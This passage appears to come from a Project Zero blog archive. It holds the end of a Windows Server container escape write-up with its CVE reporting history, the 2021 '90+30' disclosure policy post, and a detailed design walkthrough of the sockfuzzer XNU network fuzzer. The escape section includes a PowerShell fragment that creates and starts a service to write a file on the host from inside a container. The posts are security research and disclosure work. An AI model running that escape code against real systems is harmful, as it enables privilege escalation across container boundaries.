 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `
 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)
PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120, which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward: the call to PsIsCurrentThreadInServerSilo was removed, as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

Policy and Disclosure: 2021 Edition

15 April 2021 at 16:02

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

We remain committed to adapting our policies and practices to best achieve our mission, demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90"):

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.

  2. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed. In-the-wild vulnerabilities are not offered a grace period*. Earlier disclosure with mutual agreement.

  3. Technical details are immediately published when a vulnerability is patched in the grace period*. (e.g. Patched on Day 100 in grace period, disclosure on Day 100.)

2021 Trial ("90+30"):

  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed. Earlier disclosure with mutual agreement.

  2. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix. Vendors can request a 3-day grace period* for in-the-wild bugs. Earlier disclosure with mutual agreement.

  3. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period. (e.g. Patched on Day 100 in grace period, disclosure on Day 120.)

Elements of the 2020 trial that will carry over to 2021:


1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix. For vulnerabilities that are being actively exploited and reported under the 7-day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was that if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90-day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to an "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risks and benefits of technical vulnerability details or proof-of-concept exploits have been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time and reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Designing sockfuzzer, a network syscall fuzzer for XNU

22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty percent of their paid work time to pursue personal projects – with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.
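To illustrate what that 1:1 mapping buys us, here’s roughly what a replayed testcase looks like as a standalone program. This is a hedged sketch using the public connectx(2) interface on macOS; the socket type and address bytes are placeholders for whatever a crashing input chose:

// Replay sketch: one fuzzer action == one syscall.
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in dst = {0};
    dst.sin_len = sizeof(dst);
    dst.sin_family = AF_INET;
    dst.sin_port = htons(80);
    dst.sin_addr.s_addr = htonl(0x7f000001); /* 127.0.0.1 */

    sa_endpoints_t eps = {0};
    eps.sae_dstaddr = (struct sockaddr *)&dst;
    eps.sae_dstaddrlen = sizeof(dst);

    sae_connid_t cid = SAE_CONNID_ANY;
    connectx(fd, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, &cid);
    close(fd);
    return 0;
}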

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_input was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling ip_input.
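To make this concrete, here is a minimal sketch of the glue this implies, assuming a hypothetical mbuf_from_bytes helper (the fake mbuf allocator it would sit on is covered later in this post); ip_input itself is the real XNU function we link in:

#include <stddef.h>
#include <stdint.h>

struct mbuf;  // opaque here; the real definition lives in bsd/sys/mbuf.h
void ip_input(struct mbuf *m);
// Assumed helper: copies raw fuzzer bytes into a freshly allocated mbuf chain.
struct mbuf *mbuf_from_bytes(const uint8_t *data, size_t size);

void deliver_ipv4_packet(const uint8_t *data, size_t size) {
  struct mbuf *m = mbuf_from_bytes(data, size);
  if (m != NULL) {
    ip_input(m);  // ip_input takes ownership and frees the chain
  }
}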

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` are pure functions that don't require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet, and code further down in the stack decides how to handle it. Many packets contain metadata that affects the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn't been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it's expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.
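To see why this hill climbing works, consider a self-contained toy (deliberately not libFuzzer's real algorithm) where "coverage" is the number of sequential validation checks an input passes; any mutant that gets one check further is kept as the new base for mutation:

#include <cstdio>
#include <cstdlib>
#include <cstring>

constexpr int kLen = 8;
const unsigned char kMagic[kLen] = {'S', 'E', 'S', 'S', 'I', 'O', 'N', '1'};

// "Coverage": how many sequential checks the input passes.
int Coverage(const unsigned char *in) {
  int i = 0;
  while (i < kLen && in[i] == kMagic[i]) i++;
  return i;
}

int main() {
  unsigned char best[kLen] = {0};
  int best_cov = Coverage(best);
  srand(0);
  while (best_cov < kLen) {
    unsigned char mutant[kLen];
    memcpy(mutant, best, kLen);
    mutant[rand() % kLen] = (unsigned char)rand();  // one random byte mutation
    if (Coverage(mutant) > best_cov) {
      memcpy(best, mutant, kLen);  // new coverage: the mutant joins the corpus
      best_cov = Coverage(best);
      printf("passed %d/%d checks\n", best_cov, kLen);
    }
  }
}

Each check is brute-forced independently, so the expected work grows linearly with the number of checks rather than exponentially, which is exactly the property that lets the fuzzer build up dependent sequences of syscalls and packets one call at a time.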

Designing for (Development) Speed

Now that we know where to attack this code base, it's a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can't do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there's a pretty simple spectrum of strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have "end to end" kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux's KUnit project, there's an excellent quote from Linus Torvalds: "... a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently." This statement echoes the experience I had writing targeted fuzzers for code in Chrome's browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day's work, I could try out many iterations of a fuzz target thanks to a quick edit/build/run cycle. I didn't have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

"Unit" testing a kernel up through the syscall layer sounds like a big task, but it's easier than you'd expect if you forgo some complexity. We'll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let's define the overall structure of the project as pictured below. There's going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is that the original build system has to be run every time upstream is updated in order to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here's what that first pass looks like:

project(libxnu)

set(XNU_DEFINES
    -DAPPLE
    -DKERNEL
    # ...
)

set(XNU_SOURCES
    bsd/conf/param.c
    bsd/kern/kern_asl.c
    bsd/net/if.c
    bsd/netinet/ip_input.c
    # ...
)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)
add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})
target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)
target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:
      _if_clone_detach in libxnu.a(if.c.o)
  "_zfree", referenced from:
      _kqueue_destroy in libxnu.a(kern_event.c.o)
      _knote_free in libxnu.a(kern_event.c.o)
      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)
      _kev_delete in libxnu.a(kern_event.c.o)
      _pipepair_alloc in libxnu.a(sys_pipe.c.o)
      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)
      _so_cache_timer in libxnu.a(uipc_socket.c.o)
      ...
  "_zinit", referenced from:
      _knote_init in libxnu.a(kern_event.c.o)
      _kern_event_init in libxnu.a(kern_event.c.o)
      _pipeinit in libxnu.a(sys_pipe.c.o)
      _socketinit in libxnu.a(uipc_socket.c.o)
      _unp_init in libxnu.a(uipc_usrreq.c.o)
      _cfil_init in libxnu.a(content_filter.c.o)
      _tcp_init in libxnu.a(tcp_subr.c.o)
      ...
  "_zone_change", referenced from:
      _knote_init in libxnu.a(kern_event.c.o)
      _kern_event_init in libxnu.a(kern_event.c.o)
      _socketinit in libxnu.a(uipc_socket.c.o)
      _cfil_init in libxnu.a(content_filter.c.o)
      _tcp_init in libxnu.a(tcp_subr.c.o)
      _ifa_init in libxnu.a(if.c.o)
      _if_clone_attach in libxnu.a(if.c.o)
      ...
ld: symbol(s) not found for architecture x86_64
clang: error: linker command failed with exit code 1 (use -v to see invocation)
ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can use a simple trick: link against a file containing stubbed implementations of all of these symbols. We take advantage of C's weak type system here. For each function we need to implement, we can link in an implementation of the form void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. The same goal can be achieved with linker flags, but this solution was simple enough and gave me nice backtraces whenever I hit an unimplemented function.

// Unimplemented stub functions
// These should be replaced with real or mock impls.
#include <kern/assert.h>
#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {
  printf("%s: assert failed on line %d: %s\n", file, line, expression);
  __builtin_trap();
}

void IOBSDGetPlatformUUID() { assert(false); }
void IOMapperInsertPage() { assert(false); }
// ...


Then we just link this file into the XNU library we're building by adding it to the source list:

set(XNU_SOURCES
    bsd/conf/param.c
    bsd/kern/kern_asl.c
    # ...
    fuzz/syscall_wrappers.c
    fuzz/ioctl.c
    fuzz/backend.c
    fuzz/stubs.c
    fuzz/fake_impls.c
)


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting, set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,
                                                          socklen_t* anamelen,
                                                          int* retval) {
  struct accept_args uap = {
      .s = s,
      .name = name,
      .anamelen = anamelen,
  };
  return accept(kernproc, &uap, retval);
}

Note the visibility attribute that explicitly exports the symbol from the library. Because these wrappers are so formulaic, I wrote a script, generate_fuzzer.py, that generates them automatically from syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting the build working with CMake was the ability to create multiple targets with different instrumentation, which allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we're ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)
add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})
target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)
target_compile_options(net_fuzzer
                       PRIVATE -g
                               -std=c++11
                               -Werror
                               -Wno-address-of-packed-member
                               ${FUZZER_CXX_FLAGS})

if(APPLE)
target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})
else()
target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)
endif(APPLE)

Writing a Fuzz Target

At this point, we've assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I'm sure fine-grained targets could do a better job for functionality that's harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We'll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {
  required Domain domain = 1;
  required SoType so_type = 2;
  required Protocol protocol = 3;
  // TODO: options, e.g. SO_ACCEPTCONN
}

message Close {
  required FileDescriptor fd = 1;
}

message SetSocketOpt {
  optional Protocol level = 1;
  optional SocketOptName name = 2;
  // TODO(nedwill): structure for val
  optional bytes val = 3;
  optional FileDescriptor fd = 4;
}

message Command {
  oneof command {
    Packet ip_input = 1;
    SetSocketOpt set_sock_opt = 2;
    Socket socket = 3;
    Close close = 4;
  }
}

message Session {
  repeated Command commands = 1;
  required bytes data_provider = 2;
}

I left some TODO comments intact so you can see how the grammar can always be improved. As I've done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of "commands" and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a "Socket" message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it's our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one "Session" message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {
// ...
  std::set<int> open_fds;
  for (const Command &command : session.commands()) {
    int retval = 0;
    switch (command.command_case()) {
      case Command::kSocket: {
        int fd = 0;
        int err = socket_wrapper(command.socket().domain(),
                                 command.socket().so_type(),
                                 command.socket().protocol(), &fd);
        if (err == 0) {
          // Make sure we're tracking fds properly.
          if (open_fds.find(fd) != open_fds.end()) {
            printf("Found existing fd %d\n", fd);
            assert(false);
          }
          open_fds.insert(fd);
        }
        break;
      }
      case Command::kClose: {
        open_fds.erase(command.close().fd());
        close_wrapper(command.close().fd(), nullptr);
        break;
      }
      case Command::kSetSockOpt: {
        int s = command.set_sock_opt().fd();
        int level = command.set_sock_opt().level();
        int name = command.set_sock_opt().name();
        size_t size = command.set_sock_opt().val().size();
        std::unique_ptr<char[]> val(new char[size]);
        memcpy(val.get(), command.set_sock_opt().val().data(), size);
        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);
        break;
      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here's how this looks for TCP:

message Packet {
  oneof packet {
    TcpPacket tcp_packet = 1;
  }
}

message TcpPacket {
  required IpHdr ip_hdr = 1;
  required TcpHdr tcp_hdr = 2;
  optional bytes data = 3;
}

message IpHdr {
  required uint32 ip_hl = 1;
  required IpVersion ip_v = 2;
  required uint32 ip_tos = 3;
  required uint32 ip_len = 4;
  required uint32 ip_id = 5;
  required uint32 ip_off = 6;
  required uint32 ip_ttl = 7;
  required Protocol ip_p = 8;
  required InAddr ip_src = 9;
  required InAddr ip_dst = 10;
}

message TcpHdr {
  required Port th_sport = 1;
  required Port th_dport = 2;
  required TcpSeq th_seq = 3;
  required TcpSeq th_ack = 4;
  required uint32 th_off = 5;
  repeated TcpFlag th_flags = 6;
  required uint32 th_win = 7;
  required uint32 th_sum = 8;
  required uint32 th_urp = 9;
  // Ned's extensions
  required bool is_pure_syn = 10;
  required bool is_pure_ack = 11;
}

Unfortunately, protobuf doesn't support a uint8 type, so I had to use uint32 for some fields. That's some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {
  struct tcphdr tcphdr = {
      .th_sport = (unsigned short)hdr.th_sport(),
      .th_dport = (unsigned short)hdr.th_dport(),
      .th_seq = __builtin_bswap32(hdr.th_seq()),
      .th_ack = __builtin_bswap32(hdr.th_ack()),
      .th_off = hdr.th_off(),
      .th_flags = 0,
      .th_win = (unsigned short)hdr.th_win(),
      .th_sum = 0,  // TODO(nedwill): calculate the checksum instead of skipping it
      .th_urp = (unsigned short)hdr.th_urp(),
  };
  for (const int flag : hdr.th_flags()) {
    tcphdr.th_flags ^= flag;
  }
  // Prefer pure syn
  if (hdr.is_pure_syn()) {
    tcphdr.th_flags &= ~(TH_RST | TH_ACK);
    tcphdr.th_flags |= TH_SYN;
  } else if (hdr.is_pure_ack()) {
    tcphdr.th_flags &= ~(TH_RST | TH_SYN);
    tcphdr.th_flags |= TH_ACK;
  }
  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));
  return dat;
}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high-level structure is far more efficient than mutating raw bytes. It will also be easier for us to interpret crashing test cases later, as they will have the same high-level representation.
